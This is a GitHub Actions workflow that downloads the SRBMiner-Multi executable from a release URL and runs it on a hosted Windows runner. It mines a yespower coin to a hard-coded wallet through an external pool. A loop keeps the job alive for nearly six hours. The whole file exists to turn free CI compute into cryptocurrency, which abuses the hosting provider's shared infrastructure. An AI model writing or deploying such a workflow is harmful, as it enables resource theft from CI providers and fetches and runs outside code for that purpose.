name: Windows-Miner

on:
  workflow_dispatch:

jobs:
  miner:
    runs-on: windows-latest
    timeout-minutes: 360

    steps:
      - name: Download SRBMiner
        shell: pwsh
        run: |
          Invoke-WebRequest -Uri "https://github.com/doktor83/SRBMiner-Multi/releases/download/3.0.3/SRBMiner-Multi-3-0-3-win64.zip" -OutFile "miner.zip"
          Expand-Archive miner.zip -DestinationPath "miner"

      - name: Start Mining YESPOWER Rplant
        shell: pwsh
        run: |
          cd miner
          Start-Process ".\SRBMiner-MULTI.exe" -ArgumentList @(
            "--algorithm", "yespower"
            "--pool", "eu.rplant.xyz:17149"
            "--wallet", "Ab75TWDBpPx8ArWeTFLrQcgVA8xRxCwW7E"
            "--password", "x"
            "--cpu-threads", "8"
          )

      - name: Keep Alive
        shell: pwsh
        run: |
          for ($i=1; $i -le 350; $i++) {
            Write-Host "Mining Active ($i/350)"
            Start-Sleep -Seconds 60
          }
